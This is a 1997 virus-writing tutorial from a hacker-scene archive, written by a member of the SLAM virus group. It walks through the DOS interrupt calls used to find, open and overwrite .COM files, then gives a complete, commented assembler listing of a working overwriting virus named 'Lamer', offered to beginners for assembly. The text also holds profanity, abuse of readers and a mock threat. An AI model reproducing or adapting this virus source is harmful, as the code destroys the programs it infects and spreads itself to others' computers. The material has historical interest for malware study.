home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
VIRDCOLL.ZIP
/
OVER_TUT.TXT
< prev
next >
Wrap
Text File
|
1997-07-26
|
12KB
|
312 lines
" OverWritting Virii: The perfect choice for beginners "
by Virtual Daemon of SLAM Virus Team
Hi there! The reason why I'm writting this little tutorial is because
there are some dumb heads out there who don't know how to use my OVCT...
FUCK YOU LAMERS! I don't know why I'm wasting my time with you...
There are so many guys that doesn't know what is a virus... God! We must
stop this... We give to the public so many goodies (like stealth or
polimorfic virii, or macro virii, or ...etc), and they don't know to make
an overwritting virus... That's pathetic! ;-( All they know, is that they
must take all the source we give it to them, modify it and put their
stupid fucking names in our virii! And of course, we're saying that they
will just start by stealing and that they'll learn from it, but not even
2% of all don't do that. The 98% are just waiting for us to give them more
sources, so they can modify them more and spread them around saying that
they made that virus... I'm sick of that! ;-(
I can write a whole book about lamers stealing others virii (mine too),
but this was supposed to be a overwritting tutorial not a ... :)
Anyway, now that OVCT was officially released in SLAM#2, I've gotta do
this for those poor guys... maybe this way they'll learn something!
In this phile I'll try to explain what are the steps in creating a
overwritting virus, and at the end of the file I'll give some source code
examples...
Let's begin with the beginning!
Q: What is an overwritting virus?
R: An overwritting virus is a virus that when reproducing will infect the
victim by overwritting the first part of the program with itself.
ex. PROGRAM + VIRUS = VIRUSAM
Q: What do I need to make an overwritting virus?
R: In the first place you need to have a copy of a programming language.
Overwritting virii can be done in many languages such as: Pascal, C, Asm,
Basic etc., BUT the best language from all this is Assembler. Of course
there are many Assembler-style languages out there, but the best of all
is Turbo Assembler from Borland, Inc. So, if you don't have a copy,
GET ONE! Hey, when I said "get one", I ment "buy one" not "STEAL ONE"! ;)
In the 2nd place you need to know how to code in one of the languages
listed above. Since this tutorial requires assembler skills, I suggest
you to learn assembler, because this is the best language for creating
virii. If you don't know how to code in assembler I SUGGEST YOU TO GET
OUT OF HERE, AND START LEARNING ASSEMBLER! I'm not gonna teach you how
to code in assembler...
Q: What is the structure of an overwritting virus?
R: Well, it's quite simple... First you need to find a file to infect it,
right? Ok. After the file was found you need to open it for reading and
writting. Has the file been opened? Good, now you can do all that stuff
like verifying if already infected or you can just simply write your virus
to the file. After virus was written, you need to close the file, and then
to return to the operating system (DOS).
Well, that's all! Simple, ha'?
Ok. Now let's take it again, this time different:
1) Find a file to infect
2) Open the file
3) Write your virus to file
4) Close the file
5) Exit
REMEMBER that this is the simplest structure of an overwritting virus,
so for more stuff check out the sources generated by OVCT!!!
Q: What are the DOS functions which I can use in creating a overwritting
virus?
R: Like you've seen before, there are 5 steps in creating a simple
overwritting virus. I'll take the steps again, this time with the related
function...
1) Find a file to infect
- to find a file, you must use the 4Eh function (Find 1st Matching File)
Input:
AH = 4Eh
DS = SEGMENT ADRESS OF ASCIIZ FILESPEC TO FIND
DX = OFFSET ADRESS ---------- " " ----------
CX = FILE ATTRIBUTES
Returns:
AX = ERROR CODE IF CF IS SET TO CY
DTA FILLED WITH DATA IF NO ERROR (DTA = Disk Transfer Adress)
Simple code:
mov ah,4eh ;find 1st file
mov cx,0 ;cx=0 => normal attributes
mov dx,offset file ;this will put in DS:DX the adress of file
int 21h
file db '*.com',0 ;this means that will search for every file
;with the COM extension
Like I said after this code will execute the DTA will be filled with
data, but first let's see what is the structure of this DTA:
Disk Transfer Adress
*------------------*
Offset │ Size │ Contents of DTA
───────────────────────────────
0h │ 21 │ reserved
15h │ 1 │ file attributes
16h │ 2 │ file creation time
18h │ 2 │ file creation date
1ah │ 4 │ file size
1eh │ 13 │ 13 byte ASCIIZ of the file name
Note: the size is given in bytes, so in assembler one byte value can be
represented with 'db',2 bytes value with 'dw',4 bytes value with 'dd'...
ex. file_attributes db ?
file_time dw ?
file_size dd ?
You also must understand that the DTA lies in PSP (Program Segment
Prefix) - the first 100h bytes infront of COM files. It's adress is
at 80h. For complex virii, you must move the DTA at another location
so you wont have to fuck the PSP. Anyway since we're talking about
overwritting virii, that's not important.
All we have to do after we found a file is to take it's name from DTA,
because the following function (open) will need the file name. Like I
said the DTA is at 80h. The file name is at 1eh in DTA, so all you have
to do is to add 1eh to 80h, and 'voilà!'
ex. file_name=80h+1eh=9eh
2) OPEN THE FILE
- to open a file, you can use the 3Dh function (Open a File Handle)
Input:
AH = 3Dh
DS = SEGMENT ADRESS OF ASCIIZ FILENAME (our file name)
DX = OFFSET ADRESS ------------ " " ----------------
AL = OPEN MODE
-> 01h FOR READING
-> 02h FOR WRITTING
-> 03h FOR READING & WRITTING
Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE FILE HANDLE
Simple code:
;- the following 2 istructions can be replaced with "mov ax,3d02h"
mov ah,3dh ;open the file
mov al,02h ;for reading & writting
mov dx,9eh ;get file name from DTA
int 21h
Note: the file handle is now in AX, but if we have a look bellow at the
other functions, we see that all of them needs the file handle in BX,so
we have to change the BX register with AX.
ex: xchg bx,ax ;this can be done also with "mov bx,ax"
3) WRITE THE VIRUS TO FILE
- in order to write something to a file, you must use the 40h function
(Write to File via Handle)
Input:
AH = 40h
BX = FILE HANDLE (this is why we changed the BX with the AX reg)
DX = OFFSET OF ADRESS OF THE BEGINNING OF VIRUS
CX = NUMBER OF BYTES TO WRITE
Returns:
AX = ERROR CODE IF CF IS SET TO CY
ELSE NUMBER OF BYTES ACTUALLY WRITTEN <- USE FOR ERROR TESTS
Simple code:
mov ah,40h ;write the virus
mov dx,offset virus_start ;buffer to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h
4) CLOSE THE FILE
- for closing the file, you must use the 3eh function (Close a File via
Handle)
Input:
AH = 3Eh
BX = FILE HANDLE
Returns:
AX = ERROR CODE IF CF IS SET TO CY
Simple code:
mov ah,3eh ;close the file
int 21h
5) Exit
- the simplest part
Here you can use 2 methods:
a) int 20h
b) mov ah,4ch
int 21h
The both methods do the same thing: they terminate a program and return
to the operating sytem. Since the first one is smaller, I suggest using
that one.
Q: Now that I have all the informations how can I put them all together?
R: GOD! If you're still asking me this after everything I showed you then
you really suck! You're the biggest lamer! But... since I'm a good person
I'll show you this too... ;-)
────────────────────────────────────────────» cut here
; Virus Name: Lamer
; Virus Author: You
; To assemble use: tasm lamer.asm
; tlink /t lamer.obj
; (of course this expect that you'll cut & paste this code into a file
; called lamer.asm ;-)
code segment
assume cs:code,ds:code
org 100h ;for COM files
virus_start:
mov ah,4eh ;find first file
mov cx,cx ;cx=0 => normal files
mov dx,offset filespec ;ASCIIZ adress of what to search for
int 21h
mov ax,3d02h ;I explained this to ya earlier ;)
mov dx,9eh ;get file name from DTA
int 21h
xchg bx,ax ;put file handle in bx
mov ah,40h ;write the virus to file
mov dx,offset virus_start ;buffer containing data to write
mov cx,offset virus_end - offset virus_start ;size of virus
int 21h
mov ah,3eh ;close the file
int 21h
int 20h ;return to DOS
filespec db '*.com',0
virus_end:
code ends
end virus_start
────────────────────────────────────────────» cut here
Well, that's it! You've just learned how to create your first virus (I
hope! ;-) If you don't understand this then GET LOST! There's no place
for you in this life...:)
About OVCT (Overwritting Virus Construction Toolkit):
I made that shit not because I don't know to do anything else... I made
it for you! Yes, for you "dear friend", so you can learn how to create
some virii. When you think you're smart enough to create & understand
non-overwritting virii or TSR virii, then you can use my VCT (Virus
Construction Toolkit) wich will generate non-overwritting runtime
or TSR virii. Of course the generated virii will be stealth, encrypted,
anti-debugger, polymorfic, etc. I think that the 1st version of VCT
will be released during this summer (the summer of 1997). For more info
about all this check the OVCT.DOC from OVCT Distribution kit, or read the
SLAM Magazine...
Did you get all that? Anyway, I don't wanna see lamers "playing" with
my kit, and releasing virii or spreading them to others computers!!!
(I think this is one of the many reasons why I didn't included bombs in
OVCT :). If I'm gonna see a virus created with OVCT in the field, and if
I'll hear reports from people who got their comptures infected with virii
created with OVCT, YOU CAN SAY GOODBYE TO YOUR LIFE, LAMER, BECAUSE
I'M COMING TO GET YA'!!! Btw: I'm not only a virus writter, I'm a GOD DAMN
GOOD HACKER TOO!!! So, you'll hear from me... ;-)
Game over... Uh,uh .. I mean, I think this is the end of this shit...
P.S. If any of this informations helped any one in any way (not negative)
creating a virus, please let me now by sending me a e-mail. And, if
you're really oughnest with me, you'll get a special prize like the
source to my latest virus :) :) :)! And believe me, you'll want it!
Greetz:
──────
- to all the SLAM mebers
- Dark Angel: you were the best!
- Cicatrix: I love your VDAT!!! :)
- and to everybody else who is related to virus scene